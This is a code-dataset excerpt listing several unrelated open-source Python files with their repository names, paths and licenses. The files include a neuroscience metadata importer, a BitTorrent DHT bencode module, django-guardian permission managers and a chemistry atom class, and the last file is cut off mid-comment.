code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
---|---|---|---|---|---|
# -*- coding: utf-8 -*-
"""
Created on Thu Apr 18 15:37:41 2013
@author: Shreejoy
"""
import neuroelectro.models as m
from fuzzywuzzy import fuzz, process
from html_table_decode import resolveDataFloat
import re
import xlrd
import numpy as np
import csv
from assign_metadata import validate_temp_list, validate_age_list
def load_annotated_article_ephys():
print 'Updating ephys defs'
print 'Loading ephys defs'
book = xlrd.open_workbook("data/article_metadata_ephys_annotations.xlsx")
#os.chdir('C:\Python27\Scripts\Biophys')
sheet = book.sheet_by_index(0)
ncols = sheet.ncols
nrows = sheet.nrows
table= [ [ 0 for i in range(ncols) ] for j in range(nrows ) ]
for i in range(nrows):
for j in range(ncols):
value = sheet.cell(i,j).value
value = value.strip()
if value is None:
value = ''
table[i][j] = value
return table, ncols, nrows
anon_user = m.get_anon_user()
def process_table(table, ncols, nrows):
table_norm = [ [ 0 for i in range(6) ] for j in range(nrows ) ]
table_norm = np.zeros([nrows, 6], dtype='a16')
for i in range(1,nrows):
pmid = table[i][2]
# neuron_type = table[i][5]
#n = m.Neuron.objects.filter(name = neuron_type)[0]
species = table[i][7]
strain = table[i][8]
age = table[i][9]
electrode = table[i][10]
prep_type = table[i][12]
temp = table[i][11]
a = m.Article.objects.filter(pmid = pmid)[0]
#print a
m.ArticleMetaDataMap.objects.filter(article = a).delete()
# print a
temp_norm_dict = temp_resolve(unicode(temp))
#print temp_norm_dict
# temp_dict_fin = validate_temp_list([temp_norm_dict])
add_continuous_metadata('RecTemp', temp_norm_dict, a)
age_norm_dict = age_resolve(unicode(age))
#print age_norm_dict
# age_dict_fin = validate_age_list([age_norm_dict])
# print temp_dict_fin
add_continuous_metadata('AnimalAge', age_norm_dict, a)
weight_norm = weight_resolve(unicode(age))
# print temp_dict_fin
add_continuous_metadata('AnimalWeight', weight_norm, a)
strain_norm = strain_resolve(unicode(strain))
if strain_norm is not '':
add_nominal_metadata('Strain', strain_norm, a)
prep_norm = preptype_resolve(unicode(prep_type))
if prep_norm is not '':
add_nominal_metadata('PrepType', prep_norm, a)
electrode_norm = electrodetype_resolve(unicode(electrode))
#print (electrode, electrode_norm)
if electrode_norm is not '':
add_nominal_metadata('ElectrodeType', electrode_norm, a)
species_norm = species_resolve(unicode(species))
if species_norm is not '':
add_nominal_metadata('Species', species_norm, a)
if a.articlefulltext_set.all().count() > 0:
afts = m.ArticleFullTextStat.objects.get_or_create(article_full_text__article = a)[0]
afts.metadata_human_assigned = True
#print afts.metadata_human_assigned
afts.save()
# row = [species_norm, strain_norm, age_norm, electrode_norm, temp_norm, prep_norm]
# for j in range(0,len(row)):
# table_norm[i,j] = row[j]
# return table_norm
#name = 'Species', value = 'Rats'
def add_nominal_metadata(name, value, article):
metadata_ob = m.MetaData.objects.get_or_create(name=name, value=value)[0]
amd_ob = m.ArticleMetaDataMap.objects.get_or_create(article=article, metadata = metadata_ob)[0]
if amd_ob.added_by:
pass
else:
amd_ob.added_by = anon_user
amd_ob.save()
def add_continuous_metadata(name, value_dict, article):
if 'value' in value_dict:
min_range = None
max_range = None
stderr = None
if 'min_range' in value_dict:
min_range = value_dict['min_range']
if 'max_range' in value_dict:
max_range = value_dict['max_range']
if 'error' in value_dict:
stderr = value_dict['error']
cont_value_ob = m.ContValue.objects.get_or_create(mean = value_dict['value'], min_range = min_range,
max_range = max_range, stderr = stderr)[0]
metadata_ob = m.MetaData.objects.get_or_create(name=name, cont_value=cont_value_ob)[0]
amd_ob = m.ArticleMetaDataMap.objects.get_or_create(article=article, metadata = metadata_ob)[0]
if amd_ob.added_by:
# if amd_ob already exists (i.e. added by robot, don't say its assigned by a human)
pass
else:
amd_ob.added_by = anon_user
amd_ob.save()
def write_metadata(table_norm):
csvout = csv.writer(open("mydata.csv", "wb"))
csvout.writerow(("Species", "Strain", "Age", "ElectrodeType", "Temp", "PrepType"))
for row in table_norm:
csvout.writerow(row)
# print temp_resolve(unicode(temp))
#print age_resolve(unicode(age))
#print strain_resolve(unicode(strain))
# print preptype_resolve(unicode(prep_type))
# print resolveDataFloat(temp)
roomtemp_re = re.compile(ur'room|room\stemp|RT' , flags=re.UNICODE|re.IGNORECASE)
def temp_resolve(inStr):
# check if contains room temp or RT
if roomtemp_re.findall(inStr):
inStr = u'20-24'
retDict = resolveDataFloat(inStr)
# value = 22
else:
retDict = resolveDataFloat(inStr)
# if 'value' in retDict:
# value = retDict['value']
# else:
# value = ''
return retDict
weight_re = re.compile(ur'weight' , flags=re.UNICODE|re.IGNORECASE)
week_re = re.compile(ur'week|wk' , flags=re.UNICODE|re.IGNORECASE)
month_re = re.compile(ur'month|mo' , flags=re.UNICODE|re.IGNORECASE)
def age_resolve(inStr):
# check if contains room temp or RT
if weight_re.findall(inStr):
retDict = ''
return retDict
else:
retDict = resolveDataFloat(unicode(inStr))
if 'value' in retDict:
if week_re.findall(inStr):
for k in retDict.keys():
retDict[k] = retDict[k] * 7
elif week_re.findall(inStr):
for k in retDict.keys():
retDict[k] = retDict[k] * 30
# value = retDict['value']
# if week_re.findall(inStr):
# value = value * 7
# elif month_re.findall(inStr):
# value = value * 30
else:
retDict = ''
return retDict
def weight_resolve(inStr):
if weight_re.findall(inStr):
retDict = resolveDataFloat(unicode(inStr))
return retDict
else:
return ''
strain_list = m.MetaData.objects.filter(name = 'Strain')
strain_list_values = [md.value for md in strain_list]
matchThresh = 70
def strain_resolve(inStr):
if len(inStr.split()) < 1:
return ''
processOut, matchVal = process.extractOne(inStr, strain_list_values)
if matchVal > matchThresh:
return processOut
else:
return ''
jxn_list = m.MetaData.objects.filter(name = 'JxnPotential')
jxn_list_values = [md.value for md in jxn_list]
matchThresh = 70
def jxn_resolve(inStr):
if len(inStr.split()) < 1:
return ''
processOut, matchVal = process.extractOne(inStr, jxn_list_values)
if matchVal > matchThresh:
return processOut
else:
return ''
preptype_list = m.MetaData.objects.filter(name = 'PrepType')
preptype_list_values = [md.value for md in preptype_list]
matchThresh = 70
def preptype_resolve(inStr):
if len(inStr) < 1:
return ''
processOut, matchVal = process.extractOne(inStr, preptype_list_values)
if matchVal > matchThresh:
return processOut
else:
return ''
electrode_list = m.MetaData.objects.filter(name = 'ElectrodeType')
electrode_list_values = [md.value for md in electrode_list]
electrode_list_values.append('Whole-cell')
matchThresh = 70
def electrodetype_resolve(inStr):
if len(inStr) < 1:
return ''
# print inStr
processOut, matchVal = process.extractOne(inStr, electrode_list_values)
if matchVal > matchThresh:
if processOut == 'Whole-cell':
return 'Patch-clamp'
else:
return processOut
else:
return ''
species_list = m.MetaData.objects.filter(name = 'Species')
species_list_values = [md.value for md in species_list]
rat_re = re.compile('rat|rats', flags=re.UNICODE|re.IGNORECASE)
mouse_re = re.compile('mouse|mice', flags=re.UNICODE|re.IGNORECASE)
def species_resolve(inStr):
matchThresh = 70
if len(inStr) < 1:
species = ''
elif mouse_re.findall(inStr):
species = 'Mice'
elif rat_re.findall(inStr):
species = 'Rats'
else:
processOut, matchVal = process.extractOne(inStr, species_list_values)
if matchVal > matchThresh:
species = processOut
return species
else:
species = ''
return species
#def strain_resolve(inStr):
| neuroelectro/neuroelectro_org | db_functions/metadata_annotation_import.py | Python | gpl-2.0 | 9,457 |
from utils import TRUE, ERROR
class Atom:
# Empty default constructor
def __init__(self):
pass
# String constructor for atoms
@classmethod
def fromString(self, string):
newAtom = Atom()
if '(' not in string:
# no arguments
newAtom.pred = string
newAtom.args = []
else:
newAtom.pred = string.split('(')[0]
newAtom.args = string.split('(')[1].split(')')[0].split(',')
newAtom.checkRemote()
return newAtom
def getCopy(self):
copyAtom = Atom()
copyAtom.pred = self.pred
copyAtom.args = []
for arg in self.args:
copyAtom.args.append(arg)
return copyAtom
def checkRemote(self):
if '@' in self.pred:
self.remote = True
self.address = self.pred.split('@')[1]
self.table = self.pred.split('@')[0]
else:
self.remote = False
def replaceArg(self, old, new):
self.args = [x if x != old else new for x in self.args]
def vars(self):
listVars = [arg if arg.isupper() else 'dummy' for arg in self.args]
setVars = set(listVars)
if 'dummy' in setVars:
setVars.remove('dummy')
return setVars
def consts(self):
listConsts = [arg if arg.islower() else 'dummy' for arg in self.args]
setConsts = set(listConsts)
if 'dummy' in setConsts:
setConsts.remove('dummy')
return setConsts
def isGround(self):
return len(self.vars()) == 0
def __str__(self):
string = self.pred
if len(self.args) > 0:
string = string + '(' + ', '.join(self.args) + ')'
return string
def getProposition(self):
return self.pred + '_' + '_'.join(self.args)
def toDatalog(self, v):
string = self.pred + '_' + v
if len(self.args) > 0:
string = string + '(' + ', '.join(self.args) + ')'
return string
def __hash__(self):
return hash(str(self))
def __eq__(self, other):
return (self.pred, self.args) == (other.pred, other.args) | ptsankov/bellog-analysis | code/atom.py | Python | gpl-3.0 | 2,277 |
#!/usr/bin/python
#coding=utf8
# by luwei
# begin:2013-9-11
# developing...
import sys,os
import types
reload(sys)
sys.setdefaultencoding('utf-8')
#应该先转换成网络字节序
'''
b编码
'''
def req_ping_encode(dic):
try:
#请求ping编码
if dic.has_key('q') and dic['q'] == 'ping':
return 'd1:ad2:id20:' + dic['a']['id'] + \
'e1:q4:ping1:t' + str(len(dic['t'])) + \
':' + dic['t'] + '1:y1:qe'
except ValueError:
return ''
def req_find_node_encode(dic):
try:
#请求find_node编码
if dic.has_key('q') and dic['q'] == 'find_node':
return 'd1:ad2:id20:' + dic['a']['id'] + \
'6:target20:' + dic['a']['target'] + \
'e1:q9:find_node1:t' + str(len(dic['t'])) + \
':' + dic['t'] + '1:y1:qe'
except ValueError:
return ''
def req_get_peers_encode(dic):
try:
#请求get_peers编码
if dic.has_key('q') and dic['q'] == 'get_peers':
return 'd1:ad2:id20:' + dic['id'] + \
'9:info_hash20:' + dic['info_hash'] + \
'e1:q9:get_peers1:t' + str(len(dic['t'])) + \
':' + dic['t'] + '1:y1:qe'
except ValueError:
return ''
def req_announce_peer_encode(dic):
try:
#请求announce_peer编码
if dic.has_key('q') and dic['q'] == 'announce_peer':
return 'd1:ad2:id20:' + dic['id'] + \
'9:info_hash20:' + dic['info_hash'] + \
'4:porti:' + dic['port'] + 'e5token' +\
str(len(dic['token'])) + ':' + dic['token'] + \
'e1:q13:announce_peer1:t' + str(len(dic['t'])) + \
':' + dic['t'] + '1:y1:qe'
except ValueError:
return ''
def res_encode(dic):
'''
对于get_peers来说
爬虫永远不会回应资源
因为根本就“没有”
只可能回应最近的8个节点
'''
try:
#回应get_peers编码
if dic.has_key('r') and dic['r'].has_key('token'):
return 'd1:rd2:id20:' + dic['r']['id'] + \
'5nodes' + str(len(dic['r']['nodes'])) + \
':' + dic['r']['nodes'] + '5:token' + \
str(len(dic['r']['token'])) + dic['r']['token'] + \
'e1:t' + str(len(dic['t'])) + ':' + dic['t'] + \
'1:y1:re'
#回应find_node编码
elif dic.haskey('r') and dic['r'].has_key('nodes'):
return 'd1:rd2:id20:' + dic['r']['id'] + \
'5nodes' + str(len(dic['r']['nodes'])) + \
':' + dic['r']['nodes'] + 'e1:t' + str(len(dic['t'])) + \
':' + dic['t'] + '1:y1:re'
#回应其他
elif dic.haskey('r'):
return 'd1:rd2:id20:' + dic['r']['id'] + \
'e1:t' + str(len(dic['t'])) + ':' + \
dic['t'] + '1:y1:re'
except ValueError:
return ''
#解码后要转换成主机字节序
'''
解码
'''
def find_value(temp, key, index):
try:
return temp[temp.index(key) + 1][:index]
except ValueError, AttributeError:
return ''
def req_ping_decode(string):
#请求ping解码
res = {}
try:
temp = string.split(':')
res['t'] = find_value(temp, 't2', -1)
res['y'] = find_value(temp, 'y1', -1)
res['q'] = find_value(temp, 'q4', -1)
res['a'] = {'id':find_value(temp, 'id20', -2)}
return res
except ValueError, KeyError:
return {}
def req_find_node_decode(string):
#请求find_node解码
res = {}
try:
temp = string.split(':')
res['t'] = find_value(temp, 't2', -1)
res['y'] = find_value(temp, 'y1', -1)
res['q'] = find_value(temp, 'q9', -1)
res['a'] = {'id':find_value(temp, 'id20', -1), \
'target':find_value(temp, 'target20', -2)}
return res
except ValueError, KeyError:
return {}
def req_get_peers_decode(string):
#请求get_peers解码
res = {}
try:
temp = string.split(':')
res['t'] = find_value(temp, 't2', -1)
res['y'] = find_value(tmep, 'y1', -1)
res['q'] = find_value(temp, 'q9', -1)
res['a'] = {'id':find_value(temp, 'id20', -1), \
'info_hash':find_value(temp, 'info_hash20', -2)}
return res
except ValueError, KeyError:
return {}
def req_announce_peer_decode(string):
#请求announce_peer解码
res = {}
try:
temp = string.split(':')
res['t'] = find_value(temp, 't2', -1)
res['y'] = find_value(temp, 'y1', -1)
res['q'] = find_value(temp, 'q13', -1)
res['a'] = {'id':find_value(temp, 'id20', -1), \
'info_hash':find_value(temp, 'info_hash20', -1), \
'port':string[string.index('porti') + 5:string.index('e5')], \
'token':temp[temp.index('q13') - 1][:-2]}
return res
except ValueError, KeyError:
return {}
def res_ping_decode(string):
#回应ping解码
res = {}
try:
temp = string.split(':')
res['t'] = find_value(temp, 't2', -1)
res['y'] = find_value(temp, 'y1', -1)
res['r'] = {'id':find_value(temp, 'id20', -2)}
return res
except ValueError, KeyError:
return {}
def res_find_node_decode(string):
#回应find_node解码
res = {}
try:
temp = string.split(':')
res['t'] = find_value(temp, 't2', -1)
res['y'] = find_value(temp, 'y1', -1)
res['r'] = {'id':find_value(temp, 'id20', -1), \
'nodes':find_value(temp, 'nodes9', -2)}
return res
except ValueError, KeyError:
return {}
'''
爬虫永远不会发送get_peers和announce_peer
所以不会收到get_peers和announce_peer的回应
不必为get_peers和announce_peer的回应解码
'''
| zerleft/magnet_search | bcoder.py | Python | apache-2.0 | 5,993 |
# -*- coding: utf-8 -*-
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
long_description = """
============
Secretary
============
Take the power of Jinja2 templates to OpenOffice or LibreOffice and create reports and letters in your web applications.
See full `documentation on Github <https://github.com/christopher-ramirez/secretary/blob/master/README.md>`_
."""
class PyTest(TestCommand):
def finalize_options(self):
TestCommand.finalize_options(self)
self.test_args = []
self.test_suite = True
def run_tests(self):
import pytest
errno = pytest.main(self.test_args)
sys.exit(errno)
setup(
name='secretary',
version='0.2.7',
url='https://github.com/christopher-ramirez/secretary',
license='MIT',
author='Christopher Ramírez',
author_email='[email protected]',
description='Take the power of Jinja2 templates to OpenOffice or LibreOffice.',
long_description=long_description,
py_modules=['secretary', 'markdown_map'],
platforms='any',
install_requires=[
'Jinja2', 'markdown2'
],
tests_require=['pytest'],
cmdclass={'test': PyTest},
test_suite='test_secretary',
classifiers=[
'Environment :: Web Environment',
'Intended Audience :: End Users/Desktop',
'Operating System :: OS Independent',
'Programming Language :: Python',
'Development Status :: 3 - Alpha',
'Topic :: Software Development :: Libraries :: Python Modules',
'Topic :: Office/Business',
'Topic :: Utilities',
],
extras_require={
'testing': ['pytest']
}
)
| smontoya/secretary | setup.py | Python | mit | 1,694 |
from mieli.api import organization
from django.db import transaction
from django.conf import settings
from agora.api import link
@transaction.atomic
def create(user, **kwargs):
org = organization.get_by_username(user.username)
if org == None:
raise Exception("unknown organization for user '%s'" % user.username)
lnk = link.get(organization=org, user='agora')
if lnk == None:
raise Exception("no Agora Voting's admin link for organization '%s'" % org.domain)
kwargs = {}
kwargs['username'] = get_agora_username(user)
kwargs['password1'] = kwargs['password2'] = settings.AGORA_DEFAULT_KEY
kwargs['email'] = user.email
kwargs['first_name'] = 'Mieli user'
kwargs['__auth'] = True
r = lnk.post('user/register', **kwargs)
if 'errors' in r:
raise Exception(r['errors'])
login_kwargs = {}
login_kwargs['identification'] = kwargs['username']
login_kwargs['password'] = kwargs['password2']
login_ = login(lnk, **login_kwargs)
link_kwargs = {}
link_kwargs['user'] = kwargs['username']
link_kwargs['token'] = login_['apikey']
link.create(org.domain, **link_kwargs)
def login(lnk, identification, password=settings.AGORA_DEFAULT_KEY):
return lnk.post('user/login', identification=identification, password=password, __session=True)
@transaction.atomic
def delete(user, **kwargs):
org = organization.get_by_username(user.username)
if org == None:
raise Exception("unknown organization for user '%s'" % user.username)
link_kwargs = {}
link_kwargs['user'] = get_agora_username(user)
link.delete(org.domain, **link_kwargs)
def get_agora_username(user):
return user.username.replace('@', '_at_')
| pirata-cat/mieli | agora/api/user.py | Python | agpl-3.0 | 1,722 |
"""Various file utilities."""
import os
import fnmatch
def locate(pattern, root=os.curdir):
"""Locate all files matching pattern in and below given root directory."""
for path, dirs, files in os.walk(os.path.abspath(root)):
for filename in fnmatch.filter(files, pattern):
yield os.path.join(path, filename)
def find_file(pattern, root=os.curdir):
"""Return first occurence of matching file in and below root.
If no occurence file, raises a FileNotFoundError.
"""
for path in locate(pattern, root=root):
return path
raise FileNotFoundError(pattern)
def walk(storage, top='/', topdown=True, onerror=None):
"""Implement os.walk using a Django storage.
Refer to the documentation of os.walk().
Inspired by: https://gist.github.com/btimby/2175107
Parameters
----------
storage : django.Storage
top : str, optional
Same role as in os.walk().
The path at which the walk should begin. Root directory by default.
topdown : bool, optional
Same role and default value as in os.walk().
onerror : function, optional
Same role and default value as in os.walk().
"""
try:
dirs, nondirs = storage.listdir(top)
except (os.error, Exception) as err:
if onerror is not None:
onerror(err)
return
if topdown:
yield top, dirs, nondirs
for name in dirs:
new_path = os.path.join(top, name)
# recursively list subdirectories
for top_, dirs_, nondirs_ in walk(storage, top=new_path):
yield top_, dirs_, nondirs_
if not topdown:
yield top, dirs, nondirs
| oser-cs/oser-website | core/file_utils.py | Python | gpl-3.0 | 1,674 |
# exploratory-bibliography-06.py
#
# wjt
# 2 feb 2007
#
# http://digitalhistoryhacks.blogspot.com
# chronological strata in recommendations
# (I know this is really ugly and inefficient)
import urllib, time
import xml.dom.minidom
from xml.dom.minidom import Node
import pickle
import anydbm
def get_text(nodelist):
t = ""
for node in nodelist:
if node.nodeType == node.TEXT_NODE:
t = t + node.data
return t
def get_pubyear(asin):
pubdate = '0000-00-00'
baseurl = r'http://webservices.amazon.com/onca/xml?'
service = r'Service=AWSECommerceService'
amazonid = '1THTW69EYJTSND8GNA02'
access = r'&AWSAccessKeyId=' + amazonid
operation = r'&Operation=ItemLookup&ItemId=' + asin
response = r'&ResponseGroup=ItemAttributes'
r = urllib.urlopen(baseurl + service + access + operation + response)
doc = xml.dom.minidom.parse(r)
for pd in doc.getElementsByTagName("PublicationDate"):
pubdate = get_text(pd.childNodes)
return pubdate[0:4]
def incrpair(ftdict, ftkey):
if ftdict.has_key(ftkey):
ftdict[ftkey] = str(int(ftdict[ftkey]) + 1)
else:
ftdict[ftkey] = "1"
from_to = pickle.load(open('tempstorage'))
to_go = len(from_to)
for ftpair in from_to:
from_to_years = anydbm.open('from-to-years', 'c')
checklist = anydbm.open('checklist', 'c')
if str(ftpair) in checklist.keys():
print str(to_go) + " Already did " + str(ftpair)
else:
print str(to_go) + " Processing " + str(ftpair)
time.sleep(1.2)
fyear = get_pubyear(ftpair[0])
time.sleep(1.2)
tyear = get_pubyear(ftpair[1])
yearpair = str(fyear + " - " + tyear)
print yearpair
incrpair(from_to_years, yearpair)
checklist[str(ftpair)] = "1"
to_go = to_go - 1
from_to_years.close()
checklist.close()
from_to_years = anydbm.open('from-to-years', 'c')
outfile = open('from-to-years.csv', 'w')
for k in from_to_years.keys():
outstr = k[0:4] + ',' + k[7:11] + ',' + from_to_years[k] + "\n"
outfile.write(outstr)
from_to_years.close()
outfile.close() | williamjturkel/Digital-History-Hacks--2005-08- | exploratory-bibliography-06.py | Python | mit | 2,200 |
from __future__ import unicode_literals
from django.db import models
from django.contrib.contenttypes.models import ContentType
from guardian.exceptions import ObjectNotPersisted
from guardian.models import Permission
import warnings
# TODO: consolidate UserObjectPermissionManager and GroupObjectPermissionManager
class BaseObjectPermissionManager(models.Manager):
def is_generic(self):
try:
self.model._meta.get_field('object_pk')
return True
except models.fields.FieldDoesNotExist:
return False
class UserObjectPermissionManager(BaseObjectPermissionManager):
def assign_perm(self, perm, user, obj):
"""
Assigns permission with given ``perm`` for an instance ``obj`` and
``user``.
"""
if getattr(obj, 'pk', None) is None:
raise ObjectNotPersisted("Object %s needs to be persisted first"
% obj)
ctype = ContentType.objects.get_for_model(obj)
permission = Permission.objects.get(content_type=ctype, codename=perm)
kwargs = {'permission': permission, 'user': user}
if self.is_generic():
kwargs['content_type'] = ctype
kwargs['object_pk'] = obj.pk
else:
kwargs['content_object'] = obj
obj_perm, created = self.get_or_create(**kwargs)
return obj_perm
def assign(self, perm, user, obj):
""" Depreciated function name left in for compatibility"""
warnings.warn("UserObjectPermissionManager method 'assign' is being renamed to 'assign_perm'. Update your code accordingly as old name will be depreciated in 1.0.5 version.", DeprecationWarning)
return self.assign_perm(perm, user, obj)
def remove_perm(self, perm, user, obj):
"""
Removes permission ``perm`` for an instance ``obj`` and given ``user``.
"""
if getattr(obj, 'pk', None) is None:
raise ObjectNotPersisted("Object %s needs to be persisted first"
% obj)
filters = {
'permission__codename': perm,
'permission__content_type': ContentType.objects.get_for_model(obj),
'user': user,
}
if self.is_generic():
filters['object_pk'] = obj.pk
else:
filters['content_object__pk'] = obj.pk
self.filter(**filters).delete()
def get_for_object(self, user, obj):
if getattr(obj, 'pk', None) is None:
raise ObjectNotPersisted("Object %s needs to be persisted first"
% obj)
ctype = ContentType.objects.get_for_model(obj)
perms = self.filter(
content_type = ctype,
user = user,
)
return perms
class GroupObjectPermissionManager(BaseObjectPermissionManager):
def assign_perm(self, perm, group, obj):
"""
Assigns permission with given ``perm`` for an instance ``obj`` and
``group``.
"""
if getattr(obj, 'pk', None) is None:
raise ObjectNotPersisted("Object %s needs to be persisted first"
% obj)
ctype = ContentType.objects.get_for_model(obj)
permission = Permission.objects.get(content_type=ctype, codename=perm)
kwargs = {'permission': permission, 'group': group}
if self.is_generic():
kwargs['content_type'] = ctype
kwargs['object_pk'] = obj.pk
else:
kwargs['content_object'] = obj
obj_perm, created = self.get_or_create(**kwargs)
return obj_perm
def assign(self, perm, user, obj):
""" Depreciated function name left in for compatibility"""
warnings.warn("UserObjectPermissionManager method 'assign' is being renamed to 'assign_perm'. Update your code accordingly as old name will be depreciated in 1.0.5 version.", DeprecationWarning)
return self.assign_perm(perm, user, obj)
def remove_perm(self, perm, group, obj):
"""
Removes permission ``perm`` for an instance ``obj`` and given ``group``.
"""
if getattr(obj, 'pk', None) is None:
raise ObjectNotPersisted("Object %s needs to be persisted first"
% obj)
filters = {
'permission__codename': perm,
'permission__content_type': ContentType.objects.get_for_model(obj),
'group': group,
}
if self.is_generic():
filters['object_pk'] = obj.pk
else:
filters['content_object__pk'] = obj.pk
self.filter(**filters).delete()
def get_for_object(self, group, obj):
if getattr(obj, 'pk', None) is None:
raise ObjectNotPersisted("Object %s needs to be persisted first"
% obj)
ctype = ContentType.objects.get_for_model(obj)
perms = self.filter(
content_type = ctype,
group = group,
)
return perms
| mozilla/captain | vendor/lib/python/guardian/managers.py | Python | mpl-2.0 | 4,947 |
# -*- coding: utf-8 -*-
# This is a free software: you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ASE is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Lesser General Public License for more details.
import numpy as np
import QCkit.physical_constants as constants
class Atom(object):
def __init__(self, sym=None, coords=[], coord_units="bohr"):
"""
default constructor of atom object
:param sym: chemical symbol of atom
:param coords: cartesian coordinates of the atom, in units
:param coord_units: the units in which coordinates are provided, can
be bohr or angstroms, angs, Angs etc.. anthing with first letter 'A'
"""
# make sure chemical symbol has the correct
# letter-case form
sym = correct_symbol_case(sym)
self.symbol = str(sym)
# set mass
self.mass = mass_for_sym(sym)
# verify correctness of input
if np.array(coords, dtype=float).size == 3:
# if units are given in Angstroms, convert to bohr
if coord_units[0].lower() == "a":
self._xyz = np.array(coords).astype(np.float64) * constants.angstrom_to_bohr
else:
self._xyz = np.array(coords).astype(np.float64)
else:
raise ValueError("error reading the coordinates: \"{}\"".format(coords))
@property
def coords(self):
return self._xyz
@coords.setter
def coords(self, new_coord):
self._xyz = np.copy(new_coord)
@property
def atomic_number(self):
return number_for_sym(self.symbol)
def covalent_radius(self, bond_order=1):
return covalent_radii[self.atomic_number - 1, bond_order - 1]
def __str__(self):
return "{} {} {:< 10.8f} {:< 10.8f} {:< 10.8f}".format(self.symbol, self.mass, self._xyz[0], self._xyz[1],
self._xyz[2])
chemical_symbols = ['X', 'H', 'He', 'Li', 'Be',
'B', 'C', 'N', 'O', 'F',
'Ne', 'Na', 'Mg', 'Al', 'Si',
'P', 'S', 'Cl', 'Ar', 'K',
'Ca', 'Sc', 'Ti', 'V', 'Cr',
'Mn', 'Fe', 'Co', 'Ni', 'Cu',
'Zn', 'Ga', 'Ge', 'As', 'Se',
'Br', 'Kr', 'Rb', 'Sr', 'Y',
'Zr', 'Nb', 'Mo', 'Tc', 'Ru',
'Rh', 'Pd', 'Ag', 'Cd', 'In',
'Sn', 'Sb', 'Te', 'I', 'Xe',
'Cs', 'Ba', 'La', 'Ce', 'Pr',
'Nd', 'Pm', 'Sm', 'Eu', 'Gd',
'Tb', 'Dy', 'Ho', 'Er', 'Tm',
'Yb', 'Lu', 'Hf', 'Ta', 'W',
'Re', 'Os', 'Ir', 'Pt', 'Au',
'Hg', 'Tl', 'Pb', 'Bi', 'Po',
'At', 'Rn', 'Fr', 'Ra', 'Ac',
'Th', 'Pa', 'U', 'Np', 'Pu',
'Am', 'Cm', 'Bk', 'Cf', 'Es',
'Fm', 'Md', 'No', 'Lr']
# this should have the same size as "chemical_symbols" list
atomic_names = [
'', 'Hydrogen', 'Helium', 'Lithium', 'Beryllium', 'Boron',
'Carbon', 'Nitrogen', 'Oxygen', 'Fluorine', 'Neon', 'Sodium',
'Magnesium', 'Aluminium', 'Silicon', 'Phosphorus', 'Sulfur',
'Chlorine', 'Argon', 'Potassium', 'Calcium', 'Scandium',
'Titanium', 'Vanadium', 'Chromium', 'Manganese', 'Iron',
'Cobalt', 'Nickel', 'Copper', 'Zinc', 'Gallium', 'Germanium',
'Arsenic', 'Selenium', 'Bromine', 'Krypton', 'Rubidium',
'Strontium', 'Yttrium', 'Zirconium', 'Niobium', 'Molybdenum',
'Technetium', 'Ruthenium', 'Rhodium', 'Palladium', 'Silver',
'Cadmium', 'Indium', 'Tin', 'Antimony', 'Tellurium',
'Iodine', 'Xenon', 'Caesium', 'Barium', 'Lanthanum',
'Cerium', 'Praseodymium', 'Neodymium', 'Promethium',
'Samarium', 'Europium', 'Gadolinium', 'Terbium',
'Dysprosium', 'Holmium', 'Erbium', 'Thulium', 'Ytterbium',
'Lutetium', 'Hafnium', 'Tantalum', 'Tungsten', 'Rhenium',
'Osmium', 'Iridium', 'Platinum', 'Gold', 'Mercury',
'Thallium', 'Lead', 'Bismuth', 'Polonium', 'Astatine',
'Radon', 'Francium', 'Radium', 'Actinium', 'Thorium',
'Protactinium', 'Uranium', 'Neptunium', 'Plutonium',
'Americium', 'Curium', 'Berkelium', 'Californium',
'Einsteinium', 'Fermium', 'Mendelevium', 'Nobelium',
'Lawrencium', 'Unnilquadium', 'Unnilpentium', 'Unnilhexium']
# this should have the same size as "chemical_symbols" list
# the atomic masses are given in atomic mass units
atomic_masses = np.array([
0.00000, # X
1.00794, # H
4.00260, # He
6.94100, # Li
9.01218, # Be
10.81100, # B
12.01100, # C
14.00670, # N
15.99940, # O
18.99840, # F
20.17970, # Ne
22.98977, # Na
24.30500, # Mg
26.98154, # Al
28.08550, # Si
30.97376, # P
32.06600, # S
35.45270, # Cl
39.94800, # Ar
39.09830, # K
40.07800, # Ca
44.95590, # Sc
47.88000, # Ti
50.94150, # V
51.99600, # Cr
54.93800, # Mn
55.84700, # Fe
58.93320, # Co
58.69340, # Ni
63.54600, # Cu
65.39000, # Zn
69.72300, # Ga
72.61000, # Ge
74.92160, # As
78.96000, # Se
79.90400, # Br
83.80000, # Kr
85.46780, # Rb
87.62000, # Sr
88.90590, # Y
91.22400, # Zr
92.90640, # Nb
95.94000, # Mo
np.nan, # Tc
101.07000, # Ru
102.90550, # Rh
106.42000, # Pd
107.86800, # Ag
112.41000, # Cd
114.82000, # In
118.71000, # Sn
121.75700, # Sb
127.60000, # Te
126.90450, # I
131.29000, # Xe
132.90540, # Cs
137.33000, # Ba
138.90550, # La
140.12000, # Ce
140.90770, # Pr
144.24000, # Nd
np.nan, # Pm
150.36000, # Sm
151.96500, # Eu
157.25000, # Gd
158.92530, # Tb
162.50000, # Dy
164.93030, # Ho
167.26000, # Er
168.93420, # Tm
173.04000, # Yb
174.96700, # Lu
178.49000, # Hf
180.94790, # Ta
183.85000, # W
186.20700, # Re
190.20000, # Os
192.22000, # Ir
195.08000, # Pt
196.96650, # Au
200.59000, # Hg
204.38300, # Tl
207.20000, # Pb
208.98040, # Bi
np.nan, # Po
np.nan, # At
np.nan, # Rn
np.nan, # Fr
226.02540, # Ra
np.nan, # Ac
232.03810, # Th
231.03590, # Pa
238.02900, # U
237.04820, # Np
np.nan, # Pu
np.nan, # Am
np.nan, # Cm
np.nan, # Bk
np.nan, # Cf
np.nan, # Es
np.nan, # Fm
np.nan, # Md
np.nan, # No
np.nan]).astype(np.float) # Lw
# an array of covalent radii of atoms
#
# 1st column -> single bond
# 2nd column -> double bond
# 3rd column -> triple bond
#
# adapted from http://en.wikipedia.org/w/index.php?title=Covalent_radius&oldid=623288198
#
# based on
# P. Pyykkö, M. Atsumi (2009). "Molecular Single-Bond Covalent Radii for Elements 1-118".
